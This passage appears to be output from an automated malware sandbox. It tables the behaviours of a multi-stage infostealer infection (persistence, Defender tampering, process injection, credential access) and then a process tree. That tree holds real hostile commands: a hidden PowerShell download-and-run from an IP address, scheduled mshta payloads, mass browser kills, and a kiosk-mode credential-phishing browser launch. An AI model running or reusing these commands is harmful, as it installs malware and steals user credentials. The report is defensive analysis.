| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a16b636c8b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062720101\\a16b636c8b.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062730121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\26d8edfd34.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062940101\\26d8edfd34.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f33a39d263.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062950101\\f33a39d263.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5d8a752ab6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062960101\\5d8a752ab6.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\108a92f678.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062970101\\108a92f678.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\ntlogsystem.bin | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1996 set thread context of 2952 | N/A | C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe | C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe |
| PID 3656 set thread context of 324 | N/A | C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 1988 set thread context of 2016 | N/A | C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3H3K555D7JDX1PMQ5U9LJFN9WVU5S.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe
"C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe
"C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe"
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe
C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe
"C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe
"C:/Users/Admin/AppData/Roaming/winsvcs/WindowsPrinterService.exe"
C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe
"C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe"
C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe
"C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn FKRjwmaq1Wy /tr "mshta C:\Users\Admin\AppData\Local\Temp\Ro1bFndli.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\Ro1bFndli.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn FKRjwmaq1Wy /tr "mshta C:\Users\Admin\AppData\Local\Temp\Ro1bFndli.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DYGSWKX2LYZUHEALVPVSVELUY8PS3KUJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" any_word
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "j0vHkma9RZa" /tr "mshta \"C:\Temp\7Ate2U9Z1.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\7Ate2U9Z1.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe
"C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe"
C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe
"C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe"
C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe
"C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1996 -ip 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 800
C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe
"C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe"
C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe
"C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe"
C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe
"C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe
"C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe
"C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe
"C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe"
C:\Users\Admin\AppData\Local\Temp\3H3K555D7JDX1PMQ5U9LJFN9WVU5S.exe
"C:\Users\Admin\AppData\Local\Temp\3H3K555D7JDX1PMQ5U9LJFN9WVU5S.exe"
C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe
"C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 27209 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c4156f6-e391-4bc0-b594-466f9199cb58} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2400 -prefsLen 28129 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d80d95b0-4188-4705-a6b6-d07318703a7e} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2848 -childID 1 -isForBrowser -prefsHandle 3024 -prefMapHandle 3040 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42760d12-e141-42ce-b531-b4a97c9ea3b1} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4124 -childID 2 -isForBrowser -prefsHandle 4116 -prefMapHandle 4112 -prefsLen 32619 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ac157a1-f8fb-4adc-b3bb-7ed18f7fd852} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4660 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4744 -prefMapHandle 4740 -prefsLen 32619 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {563cdd56-265b-4054-a3ce-c3d948f9d5f7} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" utility
C:\Program Files\Mozilla Firefox\firefox.exe
